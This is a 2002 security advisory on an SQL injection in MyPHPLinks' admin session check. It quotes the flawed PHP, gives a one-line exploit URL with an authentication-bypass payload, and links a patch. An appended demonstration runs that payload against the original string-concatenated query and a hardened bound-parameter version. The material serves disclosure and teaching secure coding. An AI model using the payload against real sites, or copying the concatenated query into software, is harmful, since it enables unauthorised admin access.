From: Frog Man (leseulfrog_at_hotmail.com)
Date: Sat Dec 14 2002 - 12:41:45 CST

    Information :
    °°°°°°°°°°°°°°
    Website : http://www.myphpsoft.net
    Version : ? -> 2.1.9, 2.2.0CVS
    Problem : SQL Injection -> Admin access

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    admin/auth/checksession.php
    ---------------------------------------------------------------
    [...]
    if($idsession!=''){
    $dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser, $MyPHPLinksPass);
    if(!$dbs->connect())
      die($dbs->error);
    if(!$dbs->query("select count(*) as nb from ".$MyPHPLinksTBAuth." where session='".$idsession."' and timesession > now()"))
      die($dbs->error);
    while($dbs->nextrecord()){
      $loginauth = $dbs->valeur("nb");
    }
    if ($loginauth==0){
      header("Location:$MyPHPLinksAuthPErrDef");exit;
    }else{
      if(!$dbs->query("UPDATE ".$MyPHPLinksTBAuth." set timesession=now()+".$MyPHPLinksTLSession." where session='".$idsession."'"))
       die($dbs->error);
    }
    }else{
    header("Location:$MyPHPLinksAuthPErrDef");exit;
    }
    ?>
    ---------------------------------------------------------------

    Exploit :
    °°°°°°°°°
    http://[target]/admin/index.php?idsession='%20OR%20''='

    Patch :
    °°°°°°°
    A patch can be downloaded from
    http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=m .

    More details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/MyPhpLinks.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

    frog-mn
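
Added example, not part of the original advisory and not MyPHPLinks code: the session check from checksession.php written once with string concatenation and once with input validation plus a bound parameter, run against the idsession value quoted in the advisory. Assumptions: the table name `auth`, an in-memory SQLite database through PDO in place of the MySQL backend, integer timestamps instead of now(), and a 32-hex-character session id format.

```php
<?php
// Added example, not MyPHPLinks code. Table and column names are constructed
// stand-ins for $MyPHPLinksTBAuth; SQLite in memory replaces the MySQL backend.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE auth (session TEXT, timesession INTEGER)");

// One constructed, unexpired admin session.
$live = str_repeat('a1b2c3d4', 4);
$ins = $db->prepare("INSERT INTO auth (session, timesession) VALUES (?, ?)");
$ins->execute([$live, time() + 600]);

// The pattern from checksession.php: the value is pasted into the SQL text,
// so quote characters in it become part of the statement.
function count_concat(PDO $db, string $idsession): int {
    $sql = "SELECT count(*) AS nb FROM auth WHERE session='" . $idsession
         . "' AND timesession > " . time();
    return (int) $db->query($sql)->fetchColumn();
}

// Hardened form: reject anything that is not shaped like a session id
// (32 hex characters is an assumption), then bind it as a parameter so it is
// only ever compared as data.
function count_bound(PDO $db, string $idsession): int {
    if (!preg_match('/\A[0-9a-f]{32}\z/', $idsession)) {
        return 0;
    }
    $st = $db->prepare(
        "SELECT count(*) AS nb FROM auth WHERE session = ? AND timesession > ?");
    $st->execute([$idsession, time()]);
    return (int) $st->fetchColumn();
}

$fromAdvisory = "' OR ''='";   // decoded idsession value from the advisory
foreach ([$live, $fromAdvisory, 'not-a-session'] as $id) {
    printf("%-34s concat=%d bound=%d\n",
        $id, count_concat($db, $id), count_bound($db, $id));
}
```

A non-zero count is what lets checksession.php skip the redirect to the error page, so the two columns show which inputs each variant would treat as an authenticated session.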